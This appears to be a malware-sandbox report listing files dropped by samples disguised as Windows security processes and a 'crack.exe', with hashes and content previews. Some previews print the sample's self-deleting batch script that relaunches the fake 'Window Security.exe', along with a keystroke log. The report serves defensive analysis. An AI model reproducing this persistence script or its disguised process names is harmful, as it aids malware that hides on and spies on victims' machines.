                                                  Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Drawing\567ff6b0de7f9dcd8111001e94ab7cf6\System.Drawing.ni.dll",0..3,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Windows.Forms\2a7fffeef3976b2a6f273db66b1f0107\System.Windows.Forms.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\S

                                                  C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\Windows Defender Service Host.exe.log

                                                  Download File
                                                  Process:C:\Users\user\AppData\Roaming\Windows Defender Service Host.exe
                                                  File Type:CSV text
                                                  Category:dropped
                                                  Size (bytes):654
                                                  Entropy (8bit):5.380476433908377
                                                  Encrypted:false
                                                  SSDEEP:12:Q3La/KDLI4MWuPXcp1OKbbDLI4MWuPOKfSSI6Khap+92n4MNQp3/VXM5gXu9tv:ML9E4KQwKDE4KGKZI6Kh6+84xp3/VclT
                                                  MD5:30E4BDFC34907D0E4D11152CAEBE27FA
                                                  SHA1:825402D6B151041BA01C5117387228EC9B7168BF
                                                  SHA-256:A7B8F7FFB4822570DB1423D61ED74D7F4B538CE73521CC8745BC6B131C18BE63
                                                  SHA-512:89FBCBCDB0BE5AD7A95685CF9AA4330D5B0250440E67DC40C6642260E024F52A402E9381F534A9824D2541B98B02094178A15BF2320148432EDB0D09B5F972BA
                                                  Malicious:false
                                                  Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"Microsoft.VisualBasic, Version=10.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.V9921e851#\04de61553901f06e2f763b6f03a6f65a\Microsoft.VisualBasic.ni.dll",0..

                                                  C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\Windows Security Health Service.exe.log

                                                  Download File
                                                  Process:C:\Users\user\AppData\Roaming\Windows Security Health Service.exe
                                                  File Type:CSV text
                                                  Category:dropped
                                                  Size (bytes):1281
                                                  Entropy (8bit):5.370111951859942
                                                  Encrypted:false
                                                  SSDEEP:24:ML9E4KQ71qE4GIs0E4KCKDE4KGKZI6KhPKIE4TKBGKoZAE4KKUNb:MxHKQ71qHGIs0HKCYHKGSI6oPtHTHhA2
                                                  MD5:12C61586CD59AA6F2A21DF30501F71BD
                                                  SHA1:E6B279DC134544867C868E3FF3C267A06CE340C7
                                                  SHA-256:EC20A856DBBCF320F7F24C823D6E9D2FD10E9335F5DE2F56AB9A7DF1ED358543
                                                  SHA-512:B0731F59C74C9D25A4C82E166B3DC300BBCF89F6969918EC748B867C641ED0D8E0DE81AAC68209EF140219861B4939F1B07D0885ACA112D494D23AAF9A9C03FE
                                                  Malicious:false
                                                  Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Drawing\567ff6b0de7f9dcd8111001e94ab7cf6\System.Drawing.ni.dll",0..3,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Windows.Forms\2a7fffeef3976b2a6f273db66b1f0107\System.Windows.Forms.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\S

                                                  C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\Window Security.exe.log

                                                  Download File
                                                  Process:C:\Users\user\AppData\Roaming\Window Security.exe
                                                  File Type:ASCII text, with CRLF line terminators
                                                  Category:dropped
                                                  Size (bytes):1682
                                                  Entropy (8bit):5.350187081398599
                                                  Encrypted:false
                                                  SSDEEP:48:MIHK5HKH1qHiYHKh3okHZHKJHKntHo6hAHKzetTH3:Pq5qHwCYqh3ok5qJqntI6eqzIX
                                                  MD5:AE7F2402D6C6DD5CF582BB8A9AB7D8F0
                                                  SHA1:82E5A0C6F7F00154651327157E4BE6DF7AB3CEB6
                                                  SHA-256:2F09AEFCAFBB43457F64CDCD43992C51562214AC95CFAA7DEB0E9202E3E816A6
                                                  SHA-512:2FD6464EB55D5C175FE6C90AC1A037AAF0DD0B3ECDEA55862387436AF4D4833B1CCC763C19F80DCAF49D57D57B37087955EED5B7BF1B962FE9A4F7BE0D1DC5FE
                                                  Malicious:false
                                                  Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Management, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Management\96012833bebd5f21714fc508603cda97\System.Management.ni.dll",0..3,"System.Runtime.Serialization, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Runteb92aa12#\a3127

                                                  C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\crack.exe.log

                                                  Download File
                                                  Process:C:\Users\user\AppData\Roaming\crack.exe
                                                  File Type:CSV text
                                                  Category:dropped
                                                  Size (bytes):847
                                                  Entropy (8bit):5.345615485833535
                                                  Encrypted:false
                                                  SSDEEP:24:ML9E4KlKDE4KhKiKhPKIE4oKNzKoZAE4KzeR:MxHKlYHKh3oPtHo6hAHKzeR
                                                  MD5:EEEC189088CC5F1F69CEE62A3BE59EA2
                                                  SHA1:250F25CE24458FC0C581FDDF59FAA26D557844C5
                                                  SHA-256:5345D03A7E6C9436497BA4120DE1F941800F2522A21DE70CEA6DB1633D356E11
                                                  SHA-512:2E017FD29A505BCAC78C659DE10E0D869C42CE3B057840680B23961DBCB1F82B1CC7094C87CEEB8FA14826C4D8CFED88DC647422A4A3FA36C4AAFD6430DAEFE5
                                                  Malicious:true
                                                  Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02b0c61bb4\System.Xml.ni.dll",0..

                                                  C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

                                                  Download File
                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):15612
                                                  Entropy (8bit):5.0007665989277985
                                                  Encrypted:false
                                                  SSDEEP:384:d1VoGIpN6KQkj2qkjh4iUxehQVKoxOdBMNXp5rvOjJiYo0ib4J:d1V3IpNBQkj2Ph4iUxehYKoxOdBMNZd4
                                                  MD5:A8D66A40EEA8831B03CDC478ED797E6E
                                                  SHA1:F2DB655B7A8F6A211E8F6D95B50B3D7BC325F7CE
                                                  SHA-256:09178396408F3B27CBE725A8A455B37894EE4A3DBFCC34636DD23E96AB97C8CA
                                                  SHA-512:33C1DA734E45158C61EA1679202BAA3813C71901C9B5D481A09F244C9653C4DD76C1CD12378468579595C3C8CC92F60E868982BB26236841CDAE7BDB5B455C8F
                                                  Malicious:false
                                                  Preview:PSMODULECACHE.....$...z..Y...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script........$...z..T...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PSModule.psm1*.......Install-Script........Save-Module........Publish-Module........Find-Module........Download-Package........Update-Module....

                                                  C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                  Download File
                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                  File Type:data
                                                  Category:modified
                                                  Size (bytes):2228
                                                  Entropy (8bit):5.373014386086601
                                                  Encrypted:false
                                                  SSDEEP:48:oqWSU4y4RQmFoUeWmfgZ9tK8NPdYm7u1iMugeC/ZaOUyu0lhV:oqLHyIFKL3IZ2KlROugg01
                                                  MD5:83DFEBBFB8AB0069D18959BB1907B085
                                                  SHA1:2AA838CE80E32C3B6AD34BA8C6691A71F48D9DFF
                                                  SHA-256:54793FA7498449A5092850936209DE978F4F34863512B319074A7059D6D3E2B5
                                                  SHA-512:12CC44ED34ED8DBE94F403D344A4490FBA72B6EB5A467AC7817D0DA0193277252DDD6CC8DF4B90BACD2B19FE31048E01BB312DDFDC7987B6C638B2510D80617D
                                                  Malicious:false
                                                  Preview:@...e................................................@..........P................1]...E.....m.....(.Microsoft.PowerShell.Commands.ManagementH...............o..b~.D.poM......... .Microsoft.PowerShell.ConsoleHost0......................C.l]..7.s........System..4....................D...{..|f........System.Core.D...............4..7..D.#V.............System.Management.AutomationL.................*gQ?O.....x5.......#.Microsoft.Management.Infrastructure.<................t.,.lG....M...........System.Management...@................z.U..G...5.f.1........System.DirectoryServices4.................%...K... ...........System.Xml..8..................1...L..U;V.<}........System.Numerics.4.....................@.[8]'.\........System.Data.<...............i..VdqF...|...........System.ConfigurationH................WY..2.M.&..g*(g........Microsoft.PowerShell.Security...<...............V.}...@...i...........System.Transactions.P...............8..{...@.e..."4.......%.Microsoft.PowerShell.Com

                                                  C:\Users\user\AppData\Local\Temp\CMaYLAcPq0sZ.bat

                                                  Download File
                                                  Process:C:\Users\user\AppData\Roaming\Window Security.exe
                                                  File Type:DOS batch file, ASCII text, with CRLF line terminators
                                                  Category:dropped
                                                  Size (bytes):211
                                                  Entropy (8bit):5.314820080166731
                                                  Encrypted:false
                                                  SSDEEP:6:hC47bxrBeLuVFOOr+DE19aZ5lSKOZG1923fah:d5r+uVEOCDEmHlIyh
                                                  MD5:4B18D354ACE04479EC8B40533E5CBB39
                                                  SHA1:80026CF84D5D014306289B4DE11FF97796EA3833
                                                  SHA-256:E3B58DED9CFF0870D23B825CE562C996922C59B22382011DCA68F9F39A380DCD
                                                  SHA-512:5088862A341DC2B00FD4F64EE28ED2AFC660BF4430BD6BEB8260B00D35219D7BFBA363B0AA90C7D65E81F2F25BCA4328BF748908577FA2E39437F933E13D6868
                                                  Malicious:false
                                                  Preview:@echo off..chcp 65001..echo DONT CLOSE THIS WINDOW!..ping -n 10 localhost > nul..start "" "C:\Users\user\AppData\Roaming\Window Security.exe"..del /a /q /f "C:\Users\user\AppData\Local\Temp\CMaYLAcPq0sZ.bat"

                                                  C:\Users\user\AppData\Local\Temp\Dol1ysW8Xfj9.bat

                                                  Download File
                                                  Process:C:\Users\user\AppData\Roaming\Window Security.exe
                                                  File Type:DOS batch file, ASCII text, with CRLF line terminators
                                                  Category:dropped
                                                  Size (bytes):211
                                                  Entropy (8bit):5.308857636881028
                                                  Encrypted:false
                                                  SSDEEP:6:hC47bxrBeLuVFOOr+DE19aZ5lSKOZG1923f5q:d5r+uVEOCDEmHlI0
                                                  MD5:D670354A665F570A3FF12D0F8D0352FB
                                                  SHA1:0DED94680F24878F50B5463346D2FAB9D828D550
                                                  SHA-256:CD4724D211DC73F1E6F6A5E464EC66877FC90627299A5F8E233C95AE16C1BC18
                                                  SHA-512:34C1FA39EBE7FBA6C0F8CE5F525C5B56FD7FFEB271EB1440988FECB42F8E388979F29AB83C0B9266D1F9F44ACB1184A59C5B63D3DE2C969B2098B03100CD9A6E
                                                  Malicious:false
                                                  Preview:@echo off..chcp 65001..echo DONT CLOSE THIS WINDOW!..ping -n 10 localhost > nul..start "" "C:\Users\user\AppData\Roaming\Window Security.exe"..del /a /q /f "C:\Users\user\AppData\Local\Temp\Dol1ysW8Xfj9.bat"

                                                  C:\Users\user\AppData\Local\Temp\Log.tmp

                                                  Download File
                                                  Process:C:\Users\user\AppData\Roaming\Windows Defender Service Host.exe
                                                  File Type:Generic INItialization configuration [WIN]
                                                  Category:modified
                                                  Size (bytes):64
                                                  Entropy (8bit):3.6722687970803873
                                                  Encrypted:false
                                                  SSDEEP:3:rRSFYJKXzovNsr42VjFYJKXzovuEXn:EFYJKDoWr5FYJKDoG+n
                                                  MD5:DE63D53293EBACE29F3F54832D739D40
                                                  SHA1:1BC3FEF699C3C2BB7B9A9D63C7E60381263EDA7F
                                                  SHA-256:A86BA2FC02725E4D97799A622EB68BF2FCC6167D439484624FA2666468BBFB1B
                                                  SHA-512:10AB83C81F572DBAA99441D2BFD8EC5FF1C4BA84256ACDBD24FEB30A33498B689713EBF767500DAAAD6D188A3B9DC970CF858A6896F4381CEAC1F6A74E1603D0
                                                  Malicious:false
                                                  Preview:....### explorer ###..[WIN]r[WIN]....### explorer ###..r[WIN]r

                                                  C:\Users\user\AppData\Local\Temp\Q83dEbLbhfIH.bat

                                                  Download File
                                                  Process:C:\Users\user\AppData\Roaming\Window Security.exe
                                                  File Type:DOS batch file, ASCII text, with CRLF line terminators
                                                  Category:dropped
                                                  Size (bytes):211
                                                  Entropy (8bit):5.331098193307854
                                                  Encrypted:false
                                                  SSDEEP:6:hC47bxrBeLuVFOOr+DE19aZ5lSKOZG1923f/oh:d5r+uVEOCDEmHlInG
                                                  MD5:86EE14F4924A58CF80C2A794366DBA02
                                                  SHA1:52AE3C00D949E0B962CF8184D3410AEBF270C602
                                                  SHA-256:ADE9F487EC172EE9EBE9CB3A907D9985C665D0D5051FE7DD43831887507104B5
                                                  SHA-512:5FF6B56021BBE56404BFF8A74E612587A2B384C624B519F90D9997270B5E557F87A66CFD4A80A07033084E3B417FFD2E6CF6D8DEC68AE03A5FAD0CE3F76F29DF
                                                  Malicious:false
                                                  Preview:@echo off..chcp 65001..echo DONT CLOSE THIS WINDOW!..ping -n 10 localhost > nul..start "" "C:\Users\user\AppData\Roaming\Window Security.exe"..del /a /q /f "C:\Users\user\AppData\Local\Temp\Q83dEbLbhfIH.bat"

                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_0lmi3d0y.emo.ps1

                                                  Download File
                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                  File Type:ASCII text, with no line terminators
                                                  Category:dropped
                                                  Size (bytes):60
                                                  Entropy (8bit):4.038920595031593
                                                  Encrypted:false
                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                  Malicious:false
                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_0m34x4bo.42j.ps1

                                                  Download File
                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                  File Type:ASCII text, with no line terminators
                                                  Category:dropped
                                                  Size (bytes):60
                                                  Entropy (8bit):4.038920595031593
                                                  Encrypted:false
                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                  Malicious:false
                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_0tw0buoj.0f1.ps1

                                                  Download File
                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                  File Type:ASCII text, with no line terminators
                                                  Category:dropped
                                                  Size (bytes):60
                                                  Entropy (8bit):4.038920595031593
                                                  Encrypted:false
                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                  Malicious:false
                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_13o0ah4d.xqm.ps1

                                                  Download File
                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                  File Type:ASCII text, with no line terminators
                                                  Category:dropped
                                                  Size (bytes):60
                                                  Entropy (8bit):4.038920595031593
                                                  Encrypted:false
                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                  Malicious:false
                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_1ea42nkr.3yr.ps1

                                                  Download File
                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                  File Type:ASCII text, with no line terminators
                                                  Category:dropped
                                                  Size (bytes):60
                                                  Entropy (8bit):4.038920595031593
                                                  Encrypted:false
                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                  Malicious:false
                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_1qul3dj1.efm.ps1

                                                  Download File
                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                  File Type:ASCII text, with no line terminators
                                                  Category:dropped
                                                  Size (bytes):60
                                                  Entropy (8bit):4.038920595031593
                                                  Encrypted:false
                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                  Malicious:false
                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_1ytdixzj.avr.ps1

                                                  Download File
                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                  File Type:ASCII text, with no line terminators
                                                  Category:dropped
                                                  Size (bytes):60
                                                  Entropy (8bit):4.038920595031593
                                                  Encrypted:false
                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                  Malicious:false
                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_22ijqlz5.jhv.psm1

                                                  Download File
                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                  File Type:ASCII text, with no line terminators
                                                  Category:dropped
                                                  Size (bytes):60
                                                  Entropy (8bit):4.038920595031593
                                                  Encrypted:false
                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                  Malicious:false
                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_2xa5vkr0.134.psm1

                                                  Download File
                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                  File Type:ASCII text, with no line terminators
                                                  Category:dropped
                                                  Size (bytes):60
                                                  Entropy (8bit):4.038920595031593
                                                  Encrypted:false
                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                  Malicious:false
                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_41swrqfb.xgp.ps1

                                                  Download File
                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                  File Type:ASCII text, with no line terminators
                                                  Category:dropped
                                                  Size (bytes):60
                                                  Entropy (8bit):4.038920595031593
                                                  Encrypted:false
                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                  Malicious:false
                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_53fclcqa.4x1.ps1

                                                  Download File
                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                  File Type:ASCII text, with no line terminators
                                                  Category:dropped
                                                  Size (bytes):60
                                                  Entropy (8bit):4.038920595031593
                                                  Encrypted:false
                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                  Malicious:false
                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_5aia2a2f.gz2.ps1

                                                  Download File
                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                  File Type:ASCII text, with no line terminators
                                                  Category:dropped
                                                  Size (bytes):60
                                                  Entropy (8bit):4.038920595031593
                                                  Encrypted:false
                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                  Malicious:false
                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_5nc45rjk.wv5.ps1

                                                  Download File
                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                  File Type:ASCII text, with no line terminators
                                                  Category:dropped
                                                  Size (bytes):60
                                                  Entropy (8bit):4.038920595031593
                                                  Encrypted:false
                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                  Malicious:false
                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

